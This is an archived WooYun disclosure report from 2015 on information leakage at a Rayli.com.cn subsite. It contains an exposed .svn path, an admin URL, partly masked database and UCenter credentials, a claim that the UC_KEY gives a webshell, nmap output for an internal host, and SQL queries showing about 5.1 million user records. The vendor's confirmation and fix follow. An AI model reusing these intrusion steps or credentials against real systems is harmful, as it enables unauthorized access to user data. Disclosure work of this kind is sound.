乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-03: 细节已通知厂商并且等待厂商处理中 2015-01-05: 厂商已经确认,细节仅向厂商公开 2015-01-08: 厂商已经修复漏洞并主动公开,细节向公众公开
瑞丽网某分站敏感信息泄露(可直接威胁到用户数据库)
SVN信息泄露http://xiangmai.rayli.com.cn/.svn/entries
后台http://xiangmai.rayli.com.cn/index.php?/admin/login
$active_group = 'default';$active_record = TRUE;$db['default']['hostname'] = '58.68.225.131';$db['default']['username'] = 'rayli_tuitui';$db['default']['password'] = '*******************';$db['default']['database'] = 'rayli_tuitui';$db['default']['dbdriver'] = 'mysql';$db['default']['dbprefix'] = '';$db['default']['pconnect'] = TRUE;$db['default']['db_debug'] = TRUE;$db['default']['cache_on'] = FALSE;$db['default']['cachedir'] = '';$db['default']['char_set'] = 'utf8';$db['default']['dbcollat'] = 'utf8_general_ci';$db['default']['swap_pre'] = '';$db['default']['autoinit'] = TRUE;$db['default']['stricton'] = FALSE;$db['sa']['hostname'] = '58.68.225.131';$db['sa']['username'] = 'rayli_tuitui';$db['sa']['password'] = '*******************';$db['sa']['database'] = 'rayli_tuitui';$db['sa']['dbdriver'] = 'mysql';$db['sa']['dbprefix'] = '';$db['sa']['pconnect'] = TRUE;$db['sa']['db_debug'] = TRUE;$db['sa']['cache_on'] = FALSE;$db['sa']['cachedir'] = '';$db['sa']['char_set'] = 'utf8';$db['sa']['dbcollat'] = 'utf8_general_ci';$db['sa']['swap_pre'] = '';$db['sa']['autoinit'] = TRUE;$db['sa']['stricton'] = FALSE;
利用获取到的UC_KEY直接GETWEBSHELL
<?phpdefine('UC_CONNECT', '');define('UC_DBHOST', '192.168.0.13');define('UC_DBUSER', 'discuz');define('UC_DBPW', '1qaz2w****l0.13');define('UC_DBNAME', 'uc');define('UC_DBCHARSET', 'gbk');define('UC_DBTABLEPRE', '`uc`.uc_');define('UC_DBCONNECT', '0');define('UC_KEY', '1facNvxogx*******60TvvygnvUSUVk');define('UC_API', 'http://***.rayli.com.cn/uc');define('UC_CHARSET', 'gbk');define('UC_IP', '');define('UC_APPID', '20');define('UC_PPP', '20');
sh-3.2# nmap -sT -sV 192.168.0.13nmap -sT -sV 192.168.0.13Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2015-01-03 00:58 CSTInteresting ports on localhost (192.168.0.13):Not shown: 1676 closed portsPORT STATE SERVICE VERSION25/tcp open smtp Exim smtpd465/tcp open smtps?587/tcp open submission?3306/tcp open mysql MySQL 5.0.77-log1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :SF-Port587-TCP:V=4.11%I=7%D=1/3%Time=54A6CE5B%P=x86_64-redhat-linux-gnu%r(SF:GenericLines,20,"554\x20SMTP\x20synchronization\x20error\r\n");MAC Address: 00:22:19:BD:54:DB (Unknown)
select url from uc_applications;+--------------------------------------+| url |+--------------------------------------+| http://ucclient.rayli.com.cn | | http://blog.rayli.com.cn | | http://pass.rayli.com.cn | | http://adsite2.rayli.com.cn/APPDemo/ | | http://q.rayli.com.cn | | http://3w.rayli.com.cn/registration/ | | http://bbs.rayli.com.cn | | http://credit.rayli.com.cn/ | | http://product.rayli.com.cn/ | | http://star.rayli.com.cn | | http://testgo.rayli.com.cn | | http://xiangmai.rayli.com.cn | +--------------------------------------+12 rows in set (0.01 sec)
select count(*) from uc_members;+----------+| count(*) |+----------+| 5118858 | +----------+1 row in set (0.00 sec)
删除
危害等级:高
漏洞Rank:13
确认时间:2015-01-05 14:36
此漏洞已知晓,谢谢提醒,我们正在对此漏洞进行全方面的修复。
2015-01-08:非常感谢已修复